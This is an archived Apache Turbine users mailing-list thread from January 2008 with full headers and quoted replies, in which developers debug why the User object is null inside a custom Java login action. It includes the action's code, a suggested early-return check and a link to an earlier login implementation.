ndmsbar03.ndc.nasa.gov (Spam Firewall) with ESMTP id 034483D8554 for <[email protected]>; Thu, 31 Jan 2008 08:20:31 -0600 (CST) Received: from ndmsxgw04.ndc.nasa.gov (ndmsxgw04.ndc.nasa.gov [161.129.204.104]) by ndmsbar03.ndc.nasa.gov with ESMTP id ytOiPeak5fGitNzF for <[email protected]>; Thu, 31 Jan 2008 08:20:31 -0600 (CST) Received: from NDMSEVS37B.ndc.nasa.gov ([161.129.204.104]) by ndmsxgw04.ndc.nasa.gov with Microsoft SMTPSVC(262)914-4166); Thu, 31 Jan 2008 08:20:30 -0600 X-MimeOLE: Produced By Microsoft Exchange V6.5 Content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="----_=_NextPart_001_01C86414.6F4066A1" Subject: RE: user is nulled out on login attempt Date: Thu, 31 Jan 2008 08:18:11 -0600 Message-ID: <[email protected]> X-MS-Has-Attach: X-MS-TNEF-Correlator: <[email protected]> Thread-Topic: user is nulled out on login attempt Thread-Index: AchkEOwnm3zaUgcHSHe5YL2UCEbY4gAAzAMn References: <[email protected]> <[email protected]> From: "Shaw, Nathan (HQ-LD070)[InDyne, Inc]" <[email protected]> To: "Turbine Users List" <[email protected]> X-OriginalArrivalTime: 31 Jan 2008 14:20:30.0655 (UTC) FILETIME=[6F1FFCF0:01C86414] X-Virus-Checked: Checked by ClamAV on apache.org ------_=_NextPart_001_01C86414.6F4066A1 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Hi Peter, We are actually using 2.1. I know we should upgrade, but we are planning = a complete revamp of the app in 6 months. I was actually looking at the SessionValidator class when your email = arrived. However, I am not sure where to begin in trying to use it. = According to the docs, "This action is special in that it should only be = executed by the Turbine servlet." So, I guess I would have to extend it = and then set the value of that class in my TRProps file? Thanks for the help. --Nathan -----Original Message----- From: Peter Courcoux [mailto:[email protected]] Sent: Thu 1/31/2008 8:56 AM To: Turbine Users List Subject: Re: user is nulled out on login attempt =20 Hi Nathan, I assume that you are using Turbine 2.3.x. I may be wrong and I don't have the code to hand at the moment, but I=20 suspect that you might need to look at the SessionValidator which is=20 called before you get to the login page. The SessionValidator is pluggable if you need to modify it. I hope that this helps. Regards, Peter Shaw, Nathan (HQ-LD070)[InDyne, Inc] wrote: > Hi all, >=20 > I am writing my own login action and need to be able to check to see = if a user is already logged in when the action is called. If they are, I = want to skip the login stuff to preserve their session. However, every = single time that the login action is called, the User object is coming = back NULL. >=20 > Here is a code snippet. Does anyone have any idea WHY the user is = coming back NULL? I assume something is happening in Turbine somewhere = that wipes the User on a login attempt or something? >=20 >=20 > public class OutageCalLoginUser extends LoginUser { >=20 > public void doPerform( RunData data, Context context) throws Exception = { > String uname ; > String passwd ; > =20 > System.out.println("doPerform(data, context)"); > if ( data.getUserFromSession() =3D=3D null ){ > System.out.println("user from session is null"); > }else{ > System.out.println("user from session is NOT null"); > } > =20 > if(data.getUser() =3D=3D null){ > System.out.println("user is null"); > }else{ > System.out.println("user is NOT null"); > if(data.getUser().hasLoggedIn()){ > System.out.println("user is logged in"); > }else{ > System.out.println("user is NOT logged in"); > } > } > =20 > =20 > if((data.getUser() =3D=3D null) || (data.getUser() !=3D null && = data.getUser().hasLoggedIn() =3D=3D false)){ > =09 > try { > SymEncDec enc =3D SymEncDec.getInstance(); > =20 > // Username/password =3D username/pswd coming through front = door. > // User coming from elsewhere will have neither username nor = pswd. > String username =3D data.getParameters().get("username"); > String pswd =3D data.getParameters().get("password"); > =09 > // If username exists, user came in the front door. > if (username !=3D null && username.length()>0) { > uname =3D username; > passwd =3D pswd; > }else { > uname =3D "guest"; > String encryptedPasswd =3D = TurbineResources.getString("guest.credential"); > passwd =3D encryptedPasswd; > //enc.decodeBase64Decrypt(encryptedPasswd); > } > // Log the user in > doLogin(data, uname, passwd); > =20 > try { > Utils.getUserID(data); > } > catch (NullPointerException npe) { > throw new TurbineSecurityException("Bad username or password, = I say!"); > } > =09 > } > catch ( TurbineSecurityException se ) { > badUserOrPassword(se, data); > } > catch (Exception e) { > throw new PortalVelocityException(e.getMessage()=3D=3Dnull?": = "+e.getMessage():e.getMessage(), > e.getCause()=3D=3Dnull?e:e.getCause(), data); > } > =20 > } > } >=20 > }=20 >=20 --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] ------_=_NextPart_001_01C86414.6F4066A1 Content-Type: text/plain; charset=us-ascii --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] ------_=_NextPart_001_01C86414.6F4066A1-- From [email protected] Thu Jan 31 17:15:52 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 39972 invoked from network); 31 Jan 2008 17:15:52 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 31 Jan 2008 17:15:52 -0000 Received: (qmail 66287 invoked by uid 500); 31 Jan 2008 17:15:43 -0000 Delivered-To: [email protected] Received: (qmail 66274 invoked by uid 500); 31 Jan 2008 17:15:42 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user.turbine.apache.org> Reply-To: "Turbine Users List" <[email protected]> Delivered-To: mailing list [email protected] Delivered-To: moderator for [email protected] Received: (qmail 70600 invoked by uid 99); 31 Jan 2008 14:29:46 -0000 X-ASF-Spam-Status: No, hits=-4.0 required=10.0 tests=RCVD_IN_DNSWL_MED,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: local policy) MIME-Version: 1.0 X-MimeOLE: Produced By Microsoft Exchange V6.5 Content-class: urn:content-classes:message Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Subject: RE: user is nulled out on login attempt Date: Thu, 31 Jan 2008 08:29:19 -0600 Message-ID: <[email protected]> In-Reply-To: <[email protected]> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: user is nulled out on login attempt Thread-Index: AchkDhrXH0jhQP8VTaim4lnsQQc71AABz/mw References: <[email protected]> From: "Altner, Bruce (HQ-LD070)[InDyne, Inc]" <[email protected]> To: "Turbine Users List" <[email protected]> X-OriginalArrivalTime: 31 Jan 2008 14:29:19.0711 (UTC) FILETIME=[AA7786F0:01C86415] X-Virus-Checked: Checked by ClamAV on apache.org How about just doing this, early in the Login action doPerform method (first thing?): if ( data.getUserFromSession() !=3D null ) { return; } Bruce -----Original Message----- From: Shaw, Nathan (HQ-LD070)[InDyne, Inc] [mailto:[email protected]]=20 Sent: Thursday, January 31, 2008 8:35 AM To: [email protected] Subject: user is nulled out on login attempt Hi all, I am writing my own login action and need to be able to check to see if a user is already logged in when the action is called. If they are, I want to skip the login stuff to preserve their session. However, every single time that the login action is called, the User object is coming back NULL. Here is a code snippet. Does anyone have any idea WHY the user is coming back NULL? I assume something is happening in Turbine somewhere that wipes the User on a login attempt or something? public class OutageCalLoginUser extends LoginUser { public void doPerform( RunData data, Context context) throws Exception { String uname ; String passwd ; =20 System.out.println("doPerform(data, context)"); if ( data.getUserFromSession() =3D=3D null ){ System.out.println("user from session is null"); }else{ System.out.println("user from session is NOT null"); } =20 if(data.getUser() =3D=3D null){ System.out.println("user is null"); }else{ System.out.println("user is NOT null"); if(data.getUser().hasLoggedIn()){ System.out.println("user is logged in"); }else{ System.out.println("user is NOT logged in"); } } =20 =20 if((data.getUser() =3D=3D null) || (data.getUser() !=3D null && data.getUser().hasLoggedIn() =3D=3D false)){ =09 try { SymEncDec enc =3D SymEncDec.getInstance(); =20 // Username/password =3D username/pswd coming through front door. // User coming from elsewhere will have neither username nor pswd. String username =3D data.getParameters().get("username"); String pswd =3D data.getParameters().get("password"); =09 // If username exists, user came in the front door. if (username !=3D null && username.length()>0) { uname =3D username; passwd =3D pswd; }else { uname =3D "guest"; String encryptedPasswd =3D TurbineResources.getString("guest.credential"); passwd =3D encryptedPasswd; //enc.decodeBase64Decrypt(encryptedPasswd); } // Log the user in doLogin(data, uname, passwd); =20 try { Utils.getUserID(data); } catch (NullPointerException npe) { throw new TurbineSecurityException("Bad username or password, I say!"); } =09 } catch ( TurbineSecurityException se ) { badUserOrPassword(se, data); } catch (Exception e) { throw new PortalVelocityException(e.getMessage()=3D=3Dnull?": "+e.getMessage():e.getMessage(), e.getCause()=3D=3Dnull?e:e.getCause(), data); } =20 } } }=20 --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Jan 31 17:20:58 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 41268 invoked from network); 31 Jan 2008 17:20:58 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 31 Jan 2008 17:20:58 -0000 Received: (qmail 74409 invoked by uid 500); 31 Jan 2008 17:20:49 -0000 Delivered-To: [email protected] Received: (qmail 74173 invoked by uid 500); 31 Jan 2008 17:20:48 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user.turbine.apache.org> Reply-To: "Turbine Users List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 74164 invoked by uid 99); 31 Jan 2008 17:20:48 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 31 Jan 2008 09:20:48 -0800 X-ASF-Spam-Status: No, hits=-4.0 required=10.0 tests=RCVD_IN_DNSWL_MED,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO ndmsbar03.ndc.nasa.gov) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 31 Jan 2008 17:20:32 +0000 Received: from ndmsxgw04.ndc.nasa.gov (ndmsxgw04.ndc.nasa.gov [161.129.204.104]) by ndmsbar03.ndc.nasa.gov (Spam Firewall) with ESMTP id A20643DE64D for <[email protected]>; Thu, 31 Jan 2008 11:20:22 -0600 (CST) Received: from ndmsxgw04.ndc.nasa.gov (ndmsxgw04.ndc.nasa.gov [161.129.204.104]) by ndmsbar03.ndc.nasa.gov with ESMTP id ZgWQrkEzPdrtryyU for <[email protected]>; Thu, 31 Jan 2008 11:20:22 -0600 (CST) Received: from NDMSEVS37B.ndc.nasa.gov ([161.129.204.104]) by ndmsxgw04.ndc.nasa.gov with Microsoft SMTPSVC(262)914-4166); Thu, 31 Jan 2008 11:20:22 -0600 X-MimeOLE: Produced By Microsoft Exchange V6.5 Content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="----_=_NextPart_001_01C8642D.8FA36418" Subject: RE: user is nulled out on login attempt Date: Thu, 31 Jan 2008 11:17:23 -0600 Message-ID: <[email protected]> X-MS-Has-Attach: X-MS-TNEF-Correlator: <[email protected]> Thread-Topic: user is nulled out on login attempt Thread-Index: AchkDhrXH0jhQP8VTaim4lnsQQc71AABz/mwAAXyfOU= References: <[email protected]> <[email protected]> From: "Shaw, Nathan (HQ-LD070)[InDyne, Inc]" <[email protected]> To: "Turbine Users List" <[email protected]> X-OriginalArrivalTime: 31 Jan 2008 17:20:22.0379 (UTC) FILETIME=[8F7E63B0:01C8642D] X-Virus-Checked: Checked by ClamAV on apache.org ------_=_NextPart_001_01C8642D.8FA36418 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable I don't think that will work because that will mean that the user is = null and is not logged [email protected]. It will actually probably be caught by = the SessionValidator and just take them back to the login page. I am actually checking the User object and outputting whether it is null = or not in the login action. I tried both getUser() and = getUserFromSession() and they are both NULL every single time a login is = attempted. Something up the chain is clearing all of that out before the = login occurs. --Nathan -----Original Message----- From: Altner, Bruce (HQ-LD070)[InDyne, Inc] = [mailto:[email protected]] Sent: Thu 1/31/2008 9:29 AM To: Turbine Users List Subject: RE: user is nulled out on login attempt =20 How about just doing this, early in the Login action doPerform method (first thing?): if ( data.getUserFromSession() !=3D null ) { return; } Bruce -----Original Message----- From: Shaw, Nathan (HQ-LD070)[InDyne, Inc] [mailto:[email protected]]=20 Sent: Thursday, January 31, 2008 8:35 AM To: [email protected] Subject: user is nulled out on login attempt Hi all, I am writing my own login action and need to be able to check to see if a user is already logged in when the action is called. If they are, I want to skip the login stuff to preserve their session. However, every single time that the login action is called, the User object is coming back NULL. Here is a code snippet. Does anyone have any idea WHY the user is coming back NULL? I assume something is happening in Turbine somewhere that wipes the User on a login attempt or something? public class OutageCalLoginUser extends LoginUser { public void doPerform( RunData data, Context context) throws Exception { String uname ; String passwd ; =20 System.out.println("doPerform(data, context)"); if ( data.getUserFromSession() =3D=3D null ){ System.out.println("user from session is null"); }else{ System.out.println("user from session is NOT null"); } =20 if(data.getUser() =3D=3D null){ System.out.println("user is null"); }else{ System.out.println("user is NOT null"); if(data.getUser().hasLoggedIn()){ System.out.println("user is logged in"); }else{ System.out.println("user is NOT logged in"); } } =20 =20 if((data.getUser() =3D=3D null) || (data.getUser() !=3D null && data.getUser().hasLoggedIn() =3D=3D false)){ =09 try { SymEncDec enc =3D SymEncDec.getInstance(); =20 // Username/password =3D username/pswd coming through front door. // User coming from elsewhere will have neither username nor pswd. String username =3D data.getParameters().get("username"); String pswd =3D data.getParameters().get("password"); =09 // If username exists, user came in the front door. if (username !=3D null && username.length()>0) { uname =3D username; passwd =3D pswd; }else { uname =3D "guest"; String encryptedPasswd =3D TurbineResources.getString("guest.credential"); passwd =3D encryptedPasswd; //enc.decodeBase64Decrypt(encryptedPasswd); } // Log the user in doLogin(data, uname, passwd); =20 try { Utils.getUserID(data); } catch (NullPointerException npe) { throw new TurbineSecurityException("Bad username or password, I say!"); } =09 } catch ( TurbineSecurityException se ) { badUserOrPassword(se, data); } catch (Exception e) { throw new PortalVelocityException(e.getMessage()=3D=3Dnull?": "+e.getMessage():e.getMessage(), e.getCause()=3D=3Dnull?e:e.getCause(), data); } =20 } } }=20 --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] ------_=_NextPart_001_01C8642D.8FA36418 Content-Type: text/plain; charset=us-ascii --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] ------_=_NextPart_001_01C8642D.8FA36418-- From [email protected] Thu Jan 31 18:40:47 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 73654 invoked from network); 31 Jan 2008 18:40:47 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 31 Jan 2008 18:40:47 -0000 Received: (qmail 15808 invoked by uid 500); 31 Jan 2008 18:40:38 -0000 Delivered-To: [email protected] Received: (qmail 15786 invoked by uid 500); 31 Jan 2008 18:40:38 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user.turbine.apache.org> Reply-To: "Turbine Users List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 15776 invoked by uid 99); 31 Jan 2008 18:40:38 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 31 Jan 2008 10:40:38 -0800 X-ASF-Spam-Status: No, hits=-4.0 required=10.0 tests=RCVD_IN_DNSWL_MED,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO ndmsbar03.ndc.nasa.gov) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 31 Jan 2008 18:40:22 +0000 Received: from ndmsxgw03.ndc.nasa.gov (ndmsxgw03.ndc.nasa.gov [161.129.204.104]) by ndmsbar03.ndc.nasa.gov (Spam Firewall) with ESMTP id 887243E079B for <[email protected]>; Thu, 31 Jan 2008 12:40:13 -0600 (CST) Received: from ndmsxgw03.ndc.nasa.gov (ndmsxgw03.ndc.nasa.gov [161.129.204.104]) by ndmsbar03.ndc.nasa.gov with ESMTP id 5lCDC3ZD81KOv42V for <[email protected]>; Thu, 31 Jan 2008 12:40:13 -0600 (CST) Received: from NDMSEVS37A.ndc.nasa.gov ([161.129.204.104]) by ndmsxgw03.ndc.nasa.gov with Microsoft SMTPSVC(262)914-4166); Thu, 31 Jan 2008 12:40:13 -0600 MIME-Version: 1.0 X-MimeOLE: Produced By Microsoft Exchange V6.5 Content-class: urn:content-classes:message Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Subject: RE: user is nulled out on login attempt Date: Thu, 31 Jan 2008 12:40:12 -0600 Message-ID: <[email protected]> In-Reply-To: <[email protected]> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: user is nulled out on login attempt Thread-Index: AchkDhrXH0jhQP8VTaim4lnsQQc71AABz/mwAAXyfOUAAtZSwA== References: <[email protected]> <[email protected]> <[email protected]> From: "Altner, Bruce (HQ-LD070)[InDyne, Inc]" <[email protected]> To: "Turbine Users List" <[email protected]> X-OriginalArrivalTime: 31 Jan 2008 18:40:13.0338 (UTC) FILETIME=[B720B7A0:01C86438] X-Virus-Checked: Checked by ClamAV on apache.org I don't get that. The test is if the user is NOT null. Anyway, it does work. I took it from my SNA login code (our first Turbine project.) -----Original Message----- From: Shaw, Nathan (HQ-LD070)[InDyne, Inc] [mailto:[email protected]]=20 Sent: Thursday, January 31, 2008 12:17 PM To: Turbine Users List Subject: RE: user is nulled out on login attempt I don't think that will work because that will mean that the user is null and is not logged [email protected]. It will actually probably be caught by the SessionValidator and just take them back to the login page. I am actually checking the User object and outputting whether it is null or not in the login action. I tried both getUser() and getUserFromSession() and they are both NULL every single time a login is attempted. Something up the chain is clearing all of that out before the login occurs. --Nathan -----Original Message----- From: Altner, Bruce (HQ-LD070)[InDyne, Inc] [mailto:[email protected]] Sent: Thu 1/31/2008 9:29 AM To: Turbine Users List Subject: RE: user is nulled out on login attempt =20 How about just doing this, early in the Login action doPerform method (first thing?): if ( data.getUserFromSession() !=3D null ) { return; } Bruce -----Original Message----- From: Shaw, Nathan (HQ-LD070)[InDyne, Inc] [mailto:[email protected]]=20 Sent: Thursday, January 31, 2008 8:35 AM To: [email protected] Subject: user is nulled out on login attempt Hi all, I am writing my own login action and need to be able to check to see if a user is already logged in when the action is called. If they are, I want to skip the login stuff to preserve their session. However, every single time that the login action is called, the User object is coming back NULL. Here is a code snippet. Does anyone have any idea WHY the user is coming back NULL? I assume something is happening in Turbine somewhere that wipes the User on a login attempt or something? public class OutageCalLoginUser extends LoginUser { public void doPerform( RunData data, Context context) throws Exception { String uname ; String passwd ; =20 System.out.println("doPerform(data, context)"); if ( data.getUserFromSession() =3D=3D null ){ System.out.println("user from session is null"); }else{ System.out.println("user from session is NOT null"); } =20 if(data.getUser() =3D=3D null){ System.out.println("user is null"); }else{ System.out.println("user is NOT null"); if(data.getUser().hasLoggedIn()){ System.out.println("user is logged in"); }else{ System.out.println("user is NOT logged in"); } } =20 =20 if((data.getUser() =3D=3D null) || (data.getUser() !=3D null && data.getUser().hasLoggedIn() =3D=3D false)){ =09 try { SymEncDec enc =3D SymEncDec.getInstance(); =20 // Username/password =3D username/pswd coming through front door. // User coming from elsewhere will have neither username nor pswd. String username =3D data.getParameters().get("username"); String pswd =3D data.getParameters().get("password"); =09 // If username exists, user came in the front door. if (username !=3D null && username.length()>0) { uname =3D username; passwd =3D pswd; }else { uname =3D "guest"; String encryptedPasswd =3D TurbineResources.getString("guest.credential"); passwd =3D encryptedPasswd; //enc.decodeBase64Decrypt(encryptedPasswd); } // Log the user in doLogin(data, uname, passwd); =20 try { Utils.getUserID(data); } catch (NullPointerException npe) { throw new TurbineSecurityException("Bad username or password, I say!"); } =09 } catch ( TurbineSecurityException se ) { badUserOrPassword(se, data); } catch (Exception e) { throw new PortalVelocityException(e.getMessage()=3D=3Dnull?": "+e.getMessage():e.getMessage(), e.getCause()=3D=3Dnull?e:e.getCause(), data); } =20 } } }=20 --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Jan 31 19:06:13 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 79877 invoked from network); 31 Jan 2008 19:06:13 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 31 Jan 2008 19:06:13 -0000 Received: (qmail 51622 invoked by uid 500); 31 Jan 2008 19:06:03 -0000 Delivered-To: [email protected] Received: (qmail 51604 invoked by uid 500); 31 Jan 2008 19:06:03 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user.turbine.apache.org> Reply-To: "Turbine Users List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 51595 invoked by uid 99); 31 Jan 2008 19:06:03 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 31 Jan 2008 11:06:03 -0800 X-ASF-Spam-Status: No, hits=1.2 required=10.0 tests=SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO elasmtp-kukur.atl.sa.earthlink.net) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 31 Jan 2008 19:05:46 +0000 Received: from [161.129.204.104] (helo=office.kiasoft.com) by elasmtp-kukur.atl.sa.earthlink.net with asmtp (Exim 4.34) id 1JKej9-0000vg-DO for [email protected]; Thu, 31 Jan 2008 14:05:35 -0500 Received: by office.kiasoft.com (Postfix, from userid 48) id AE31B16884F; Thu, 31 Jan 2008 13:08:07 -0500 (EST) Received: from 161.129.204.104 (SquirrelMail authenticated user painter) by webmail.kiasoft.com with HTTP; Thu, 31 Jan 2008 13:08:07 -0500 (EST) Message-ID: <[email protected]> In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> Date: Thu, 31 Jan 2008 13:08:07 -0500 (EST) Subject: RE: user is nulled out on login attempt From: "Jeffery Painter" <[email protected]> To: "Turbine Users List" <[email protected]> Reply-To: [email protected] User-Agent: SquirrelMail/1.4.8-2.fc6 MIME-Version: 1.0 Content-Type: text/plain;charset=iso-8859-1 X-Priority: 3 (Normal) Importance: Normal Content-Transfer-Encoding: quoted-printable X-ELNK-Trace: cf82c58664c8867910a091893a8585a77e972de0d01da940ecaf0547c1f80fb30056c8096be5e474350badd9bab72f9c350badd9bab72f9c350badd9bab72f9c X-Originating-IP: 161.129.204.104 X-Virus-Checked: Checked by ClamAV on apache.org I had used Turbine to build a prototype of an electronic health record system. I can't remember if we were using Turbine 2.1 or 2.2 but I have my custom login action is here: http://office.kiasoft.com/viewcvs/viewcvs.cgi/agrippa/WebRoot/WEB-INF/src= /edu/ncsu/csc/agrippa/modules/actions/AgrippaLoginUser.java?rev=3D161.129.204.104= &content-type=3Dtext/vnd.viewcvs-markup Maybe that will give you some insight... it worked last time I ran the code but that was Dec 2006... Hope it helps --=20 Jeffery Painter Knowledge Engineer Semantic Technologies Group Statistical and Quantitative Sciences GlaxoSmithKline Research and Development > I don't get that. The test is if the user is NOT null. > > Anyway, it does work. I took it from my SNA login code (our first > Turbine project.) > > -----Original Message----- > From: Shaw, Nathan (HQ-LD070)[InDyne, Inc] > [mailto:[email protected]] > Sent: Thursday, January 31, 2008 12:17 PM > To: Turbine Users List > Subject: RE: user is nulled out on login attempt > > I don't think that will work because that will mean that the user is > null and is not logged [email protected]. It will actually probably be caught b= y > the SessionValidator and just take them back to the login page. > > I am actually checking the User object and outputting whether it is nul= l > or not in the login action. I tried both getUser() and > getUserFromSession() and they are both NULL every single time a login i= s > attempted. Something up the chain is clearing all of that out before th= e > login occurs. > > --Nathan > > > -----Original Message----- > From: Altner, Bruce (HQ-LD070)[InDyne, Inc] > [mailto:[email protected]] > Sent: Thu 1/31/2008 9:29 AM > To: Turbine Users List > Subject: RE: user is nulled out on login attempt > > How about just doing this, early in the Login action doPerform method > (first thing?): > > > if ( data.getUserFromSession() !=3D null ) > { > return; > } > > > Bruce > > -----Original Message----- > From: Shaw, Nathan (HQ-LD070)[InDyne, Inc] > [mailto:[email protected]] > Sent: Thursday, January 31, 2008 8:35 AM > To: [email protected] > Subject: user is nulled out on login attempt > > > Hi all, > > I am writing my own login action and need to be able to check to see if > a user is already logged in when the action is called. If they are, I > want to skip the login stuff to preserve their session. However, every > single time that the login action is called, the User object is coming > back NULL. > > Here is a code snippet. Does anyone have any idea WHY the user is comin= g > back NULL? I assume something is happening in Turbine somewhere that > wipes the User on a login attempt or something? > > > public class OutageCalLoginUser extends LoginUser { > > public void doPerform( RunData data, Context context) throws Exception = { > String uname ; > String passwd ; > > System.out.println("doPerform(data, context)"); > if ( data.getUserFromSession() =3D=3D null ){ > System.out.println("user from session is null"); > }else{ > System.out.println("user from session is NOT null"); > } > > if(data.getUser() =3D=3D null){ > System.out.println("user is null"); > }else{ > System.out.println("user is NOT null"); > if(data.getUser().hasLoggedIn()){ > System.out.println("user is logged in"); > }else{ > System.out.println("user is NOT logged in"); > } > } > > > if((data.getUser() =3D=3D null) || (data.getUser() !=3D null && > data.getUser().hasLoggedIn() =3D=3D false)){ > > try { > SymEncDec enc =3D SymEncDec.getInstance(); > > // Username/password =3D username/pswd coming through front > door. > // User coming from elsewhere will have neither username > nor pswd. > String username =3D data.getParameters().get("username"); > String pswd =3D data.getParameters().get("password"); > > // If username exists, user came in the front door. > if (username !=3D null && username.length()>0) { > uname =3D username; > passwd =3D pswd; > }else { > uname =3D "guest"; > String encryptedPasswd =3D > TurbineResources.getString("guest.credential"); > passwd =3D encryptedPasswd; > //enc.decodeBase64Decrypt(encryptedPasswd); > } > // Log the user in > doLogin(data, uname, passwd); > > try { > Utils.getUserID(data); > } > catch (NullPointerException npe) { > throw new TurbineSecurityException("Bad username or > password, I say!"); > } > > } > catch ( TurbineSecurityException se ) { > badUserOrPassword(se, data); > } > catch (Exception e) { > throw new PortalVelocityException(e.getMessage()=3Dull?": > "+e.getMessage():e.getMessage(), > e.getCause()=3Dull?e:e.getCause(), data); > } > > } > } > > } > > --------------------------------------------------------------------- > To unsubscribe, e-mail: [email protected] > For additional commands, e-mail: [email protected] > > > > > > --------------------------------------------------------------------- > To unsubscribe, e-mail: [email protected] > For additional commands, e-mail: [email protected] > --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Jan 31 19:14:32 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 81725 invoked from network); 31 Jan 2008 19:14:32 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 31 Jan 2008 19:14:32 -0000 Received: (qmail 61106 invoked by uid 500); 31 Jan 2008 19:14:23 -0000 Delivered-To: [email protected] Received: (qmail 61091 invoked by uid 500); 31 Jan 2008 19:14:23 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user.turbine.apache.org> Reply-To: "Turbine Users List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 61082 invoked by uid 99); 31 Jan 2008 19:14:23 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 31 Jan 2008 11:14:23 -0800 X-ASF-Spam-Status: No, hits=-2.0 required=10.0 tests=HTML_MESSAGE,RCVD_IN_DNSWL_MED,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO ndmsbar04.ndc.nasa.gov) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 31 Jan 2008 19:14:05 +0000 Received: from ndmsxgw04.ndc.nasa.gov (ndmsxgw04.ndc.nasa.gov [161.129.204.104]) by ndmsbar04.ndc.nasa.gov (Spam Firewall) with ESMTP id 72B3686E374 for <[email protected]>; Thu, 31 Jan 2008 13:13:55 -0600 (CST) Received: from ndmsxgw04.ndc.nasa.gov (ndmsxgw04.ndc.nasa.gov [161.129.204.104]) by ndmsbar04.ndc.nasa.gov with ESMTP id nOk42xFEERyd3iAg for <[email protected]>; Thu, 31 Jan 2008 13:13:55 -0600 (CST) Received: from NDMSEVS37B.ndc.nasa.gov ([161.129.204.104]) by ndmsxgw04.ndc.nasa.gov with Microsoft SMTPSVC(262)914-4166); Thu, 31 Jan 2008 13:13:52 -0600 X-MimeOLE: Produced By Microsoft Exchange V6.5 Content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01C8643D.6AA21AC6" Subject: RE: user is nulled out on login attempt Date: Thu, 31 Jan 2008 13:10:25 -0600 Message-ID: <[email protected]> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: user is nulled out on login attempt Thread-Index: AchkPF1+kXuHDCk6TIGtoioQyRmG2gAAJG7q References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> From: "Shaw, Nathan (HQ-LD070)[InDyne, Inc]" <[email protected]> To: "Turbine Users List" <[email protected]> X-OriginalArrivalTime: 31 Jan 2008 19:13:52.0515 (UTC) 